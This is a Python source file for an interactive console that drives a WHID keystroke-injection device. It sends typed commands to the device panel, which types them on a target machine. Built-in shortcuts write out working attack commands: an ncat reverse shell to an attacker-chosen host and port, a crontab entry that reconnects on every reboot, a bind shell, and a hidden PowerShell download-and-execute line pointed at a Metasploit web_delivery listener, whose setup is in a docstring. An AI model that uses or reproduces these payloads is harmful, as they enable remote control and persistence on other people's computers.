#!/usr/bin/python3
# -*- coding: utf-8 -*-
# NOTE: python3 WHIDInjector.py -v --host 192.168.10.22 --port 4242 #reverse
import requests
import argparse
import re
from WhidInfo import *
from WhidEngine import *
from pathlib import Path
from urllib.parse import urlencode, quote_plus
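if __name__ == "__main__":
    # Interactive console for a WHID panel: each line typed at the prompt is
    # either a console command (SET, help, q/exit), a shortcut that expands to
    # a predefined command line, or free text. Anything that is sent is first
    # converted to a keystroke script by WhidEngine.convert_to_keymap and then
    # posted to "<panel>/runlivepayload" by WhidEngine.send_payload.

    # Keystroke template for one-off sends: wait, type the text, wait, then
    # press key code 176 (presumably Enter -- confirm against the firmware).
    LIVE_TEMPLATE = "CustomDelay:1000\nPrint:%s\nCustomDelay:1000\nPress:176"

    # Parsing argument from command line
    parser = argparse.ArgumentParser()
    parser.add_argument('-v', action='store_true', dest='verbose', help='Verbosity of the output')
    parser.add_argument('--force', action='store_true', dest='force', help='Force the output in french')
    parser.add_argument('--host', nargs='?', default='127.0.0.1', help='Host reverse-shell')
    parser.add_argument('--port', nargs='?', default='4242', help='Port reverse-shell')
    # NOTE(review): --user/--pass are parsed but never handed to WhidEngine in
    # this file, and '--pass' is stored under the keyword name 'pass', so it is
    # only reachable through getattr(results, 'pass'). The default password is
    # embedded in the source; treat it as public, not as a secret.
    parser.add_argument('--user', nargs='?', default='admin', help='Panel username')
    parser.add_argument('--pass', nargs='?', default='hacktheplanet', help='Panel password')
    # NOTE(review): the default panel URL is plain http://, so everything sent
    # to the panel crosses the link unencrypted.
    parser.add_argument('--panel', nargs='?', default='http://192.168.1.1', help='Panel url')
    parser.add_argument('--wifi_ssid', nargs='?', default='Exploit', help='Wifi ssid')
    parser.add_argument('--wifi_pass', nargs='?', default='DotAgency', help='Wifi password')
    parser.add_argument('--payload', nargs='?', default='payloads/default.txt', help='Payload template')
    results = parser.parse_args()

    # Default payload template; a missing or unreadable file is reported as a
    # usage error instead of a traceback.
    try:
        with open(results.payload, 'r') as f:
            payload = f.read()
    except OSError as err:
        parser.error("cannot read payload template %s: %s" % (results.payload, err))

    info = WhidInfo()
    whid = WhidEngine(results.panel)

    while True:
        try:
            user_input = input("\033[92m>>> \033[0m")
        except EOFError:
            # Closed stdin (Ctrl-D, end of piped input) ends the session.
            break

        # Handling : SET xxxxxx yyyyyy
        options = user_input.split(" ")
        if options[0].upper() == "SET":
            if len(options) < 3:
                # "SET" or "SET host" used to raise IndexError and kill the console.
                print("Unknown option - e.g: SET host 127.0.0.1")
                continue
            name, value = options[1], options[2]
            if name in ("host", "port", "user", "panel", "wifi_ssid", "wifi_pass"):
                # NOTE(review): "SET panel" changes the URL used for sends below,
                # but `whid` was built from the original panel value -- confirm
                # WhidEngine does not keep its own copy.
                setattr(results, name, value)
            elif name == "verbose":
                results.verbose = value.lower() == "true"
            elif name == "payload":
                # Switch templates only if the new file can actually be read,
                # so a typo keeps the previous template active.
                try:
                    with open(value, 'r') as f:
                        new_payload = f.read()
                except OSError as err:
                    print("Cannot read payload template %s: %s" % (value, err))
                else:
                    results.payload = value
                    payload = new_payload
            else:
                print("Unknown option - e.g: SET host 127.0.0.1")
            continue

        # Simple user interactions
        if user_input in ("q", "exit"):
            break
        if user_input in ("h", "help"):
            info.help()
            info.help_keyboard()
            info.help_commands()
            continue

        # Shortcuts: the three Linux ones only rewrite user_input and fall
        # through to the default-payload send at the bottom of the loop.
        # Reverse Shell Linux
        if user_input == "reverse":
            user_input = "bash -c 'nohup ncat %s %s -e $SHELL &'" % (results.host, results.port)

        # Crontab Linux (installs an @reboot entry in the user's crontab)
        elif user_input == "crontab":
            user_input = "bash -c '(crontab -l ; echo \"@reboot sleep 200 && ncat %s %s -e /bin/bash\")|crontab 2> /dev/null'" % (results.host, results.port)

        # Bind Shell Linux
        elif user_input == "bind":
            user_input = "bash -c 'nohup ncat -lvp %s -e $SHELL -k &'" % (results.port)

        # Meterpreter or anything for Windows
        elif "meterpreter" in user_input:
            """
            # Use the following to set up the listener
            use exploit/multi/script/web_delivery
            set SRVHOST YOUR_SERVER_IP
            set SRVPORT 4646
            set SSL true
            set target 2
            set URIPATH posh-payload
            set payload windows/meterpreter/reverse_https
            set ExitOnSession false
            set LHOST YOUR_SERVER_IP
            set LPORT 4545
            exploit -j -z
            # E.g: meterpreter https://YOUR_SERVER_IP:4646/posh-payload
            """
            words = user_input.split(" ")
            if len(words) > 1:
                msf_host = words[1]
            else:
                msf_host = "https://%s:%s/posh-payload" % (results.host, results.port)

            # Detection note: the command typed on the target is a hidden,
            # no-profile PowerShell that disables TLS certificate validation
            # and evaluates a downloaded string; command-line and script-block
            # logging will show exactly these tokens.
            user_input = "powershell.exe -nop -w hidden -c [System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$i=new-object net.webclient;$i.proxy=[Net.WebRequest]::GetSystemWebProxy();$i.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $i.downloadstring('%s');" % msf_host

            # Send the payload
            user_converted = whid.convert_to_keymap(user_input, LIVE_TEMPLATE, results.force)
            whid.send_payload(user_converted, results.panel+"/runlivepayload")
            continue

        # Send simple text without using a payload chain
        elif user_input.split(' ')[0] == 'send':
            # Convert the simple text to keymap
            # NOTE(review): the words are joined with an empty string, so the
            # spaces between them are dropped -- confirm this is intended.
            txt = "".join(user_input.split(' ')[1:])
            user_converted = whid.convert_to_keymap(txt, LIVE_TEMPLATE, results.force)
            if results.verbose:
                print('\033[92mText:\033[0m\n%s' % user_converted)

            # Send the payload
            whid.send_payload(user_converted, results.panel+"/runlivepayload")
            continue

        # Send evil command with default payload
        if user_input != "":
            # Convert from AZERTY to QWERTY
            user_converted = whid.convert_to_keymap(user_input, payload, results.force)
            if results.verbose:
                print('\033[92mPayload:\033[0m\n%s' % user_converted)

            # Send the payload
            whid.send_payload(user_converted, results.panel+"/runlivepayload")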